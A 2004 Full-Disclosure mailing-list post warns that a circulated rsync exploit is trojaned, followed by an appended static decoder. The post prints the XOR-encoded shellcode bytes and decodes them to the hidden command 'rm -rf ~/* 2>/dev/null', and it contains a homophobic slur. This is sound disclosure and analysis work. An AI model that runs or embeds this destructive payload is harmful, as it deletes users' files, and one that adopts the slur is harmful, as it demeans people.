[Full-Disclosure] rsynd-too-open.c posted on fd is backdoored. Don't run it!!!

From: DownBload / Illegal Instruction Labs (downbload_at_hotmail.com)
Date: 05/29/04

    To: full-disclosure@lists.netsys.com
    Date: Sat, 29 May 2004 15:24:09 +0200
    
    

    The rsync <= 2.6.1 remote exploit posted to the full-disclosure list is a
    fake and malicious exploit.
    Don't run it!!!

    rsynd-too-open.c:
    ....
    void (*funct) ();
    ....
    (long) funct = &shellcode2;
    ....
    funct();
    ....

    "shellcode2" is malicious asm code that will delete your home directory.
    The shellcode is encrypted with a simple XOR algorithm to obscure its main
    purpose.
    Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot
    :).
    I can understand people who backdoor exploits to hack machines, but placing
    backdoors that will delete user home dir is evil and plain stupid.

    [root@laptop BACKDOOR]# gcc back.c
    [root@laptop BACKDOOR]# ./a.out
    % / b i n / s h s h - c r m - r f ~ / * 2 > / d e v / n u l l

    back.c
    ---cut here---
    #include <stdio.h>

    /* shellcode2 as found in rsynd-too-open.c: a 23-byte decoder stub
     * (mov cl,0x4b / mov al,0xff / xor [esi],al / dec al / loop) followed
     * by 0x4b XOR-encoded bytes */
    char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";

    int main (void)
    {
            /* encoded data starts right after the 23-byte stub; the key
             * starts at 0xff and is decremented once per byte, as in the stub */
            unsigned char *decrypt = (unsigned char *) shellcode2 + 23, key = 0xff;
            int x;
            /* only the first 0x29 bytes are printed: that is the string region
             * ("/bin/sh", "sh", "-c", "rm -rf ~/* 2>/dev/null"); the rest of the
             * 0x4b bytes decode to machine code */
            for (x = 0; x < 0x29; x++) {
                    printf ("%c ", *decrypt ^ key);
                    decrypt++;
                    key--;
            }
            printf ("\n");
            return 0;
    }
    ---cut here---


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
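The following is an added example, not part of DownBload's post or of the backdoored exploit: a static decoder that recovers the full payload the way the stub itself would at run time, instead of hard-coding the offset, key and length. It pulls the loop count from the stub's `mov cl, imm8` (b1 xx) and the initial key from `mov al, imm8` (b0 xx), checks for the `dec al` that makes the key decrement, XOR-decodes all 0x4b bytes, and then pulls out the NUL-terminated strings. The byte offsets checked in `stub_params` are specific to this one stub (this is a pattern match, not a disassembler), and the function names and the constructed copy of `shellcode2` are mine. Requiring a NUL terminator is what keeps the machine code that follows the strings (which contains no NUL byte) out of the string list.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed copy of shellcode2 exactly as quoted in the post (98 bytes):
 * a 23-byte decoder stub followed by 0x4b bytes of XOR-encoded payload. */
static const unsigned char shellcode2[] =
    "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    "\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    "\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    "\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    "\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    "\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    "\x7b\x35";

#define STUB_LEN    23   /* jmp, pop, xor, mov, mov, xor, dec, inc, loop, jmp, call */
#define MAX_STRINGS 16
#define MAX_STRLEN  64

/* Read the loop count and initial key out of the stub's own instructions:
 *   b1 XX  mov cl, XX   (bytes 5-6)
 *   b0 XX  mov al, XX   (bytes 7-8)
 *   fe c8  dec al       (bytes 11-12) -> key decrements once per byte
 * Offsets are specific to this stub (assumption: pattern check, not a
 * disassembler). Returns 0 on success, -1 if the stub does not match. */
static int stub_params(const unsigned char *sc, size_t len,
                       unsigned *count, unsigned char *key)
{
    if (len < STUB_LEN) return -1;
    if (sc[5] != 0xb1 || sc[7] != 0xb0 || sc[11] != 0xfe || sc[12] != 0xc8)
        return -1;
    *count = sc[6];
    *key = sc[8];
    return 0;
}

/* Decode the whole payload as the stub would: out[i] = payload[i] ^ (key - i).
 * Returns the number of bytes decoded, or -1 if the stub does not match or
 * a buffer is too small. */
static int decode_payload(const unsigned char *sc, size_t len,
                          unsigned char *out, size_t outcap)
{
    unsigned count;
    unsigned char key;
    if (stub_params(sc, len, &count, &key) < 0) return -1;
    if (STUB_LEN + count > len || count > outcap) return -1;
    for (unsigned i = 0; i < count; i++) {
        out[i] = sc[STUB_LEN + i] ^ key;
        key--;                      /* mirrors "dec al" in the stub */
    }
    return (int)count;
}

/* Collect NUL-terminated runs of printable ASCII of at least min_len bytes.
 * A run that ends in any other byte (or at end of buffer) is discarded, so
 * the machine code after the strings does not produce false hits.
 * Returns how many strings were copied into out[]. */
static int extract_strings(const unsigned char *buf, size_t len, size_t min_len,
                           char out[][MAX_STRLEN], int max)
{
    int n = 0;
    size_t start = 0;
    for (size_t i = 0; i < len && n < max; i++) {
        if (buf[i] >= 0x20 && buf[i] <= 0x7e)
            continue;               /* still inside a printable run */
        size_t run = i - start;
        if (buf[i] == 0 && run >= min_len && run < MAX_STRLEN) {
            memcpy(out[n], buf + start, run);
            out[n][run] = '\0';
            n++;
        }
        start = i + 1;
    }
    return n;
}

int main(void)
{
    unsigned char plain[256];
    char strs[MAX_STRINGS][MAX_STRLEN];
    int n = decode_payload(shellcode2, sizeof(shellcode2) - 1, plain, sizeof plain);
    if (n < 0) {
        fputs("decoder stub not recognised\n", stderr);
        return 1;
    }
    printf("decoded %d payload bytes:\n", n);
    for (int i = 0; i < n; i++)
        printf("%02x%c", plain[i], (i % 16 == 15 || i == n - 1) ? '\n' : ' ');
    int k = extract_strings(plain, (size_t)n, 2, strs, MAX_STRINGS);
    for (int i = 0; i < k; i++)
        printf("string[%d] = \"%s\"\n", i, strs[i]);
    return 0;
}
```

Run stand-alone it hex-dumps all 0x4b decoded bytes and lists four strings: "/bin/sh", "sh", "-c" and "rm -rf ~/* 2>/dev/null". The first decoded bytes (e8 25 00 00 00) are a `call` over the string block, and by my reading the code after the strings pushes those four pointers and issues an `int 0x80` with eax=11, i.e. execve(2) of the rm command; the dump lets a reader verify that without executing anything from the exploit.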

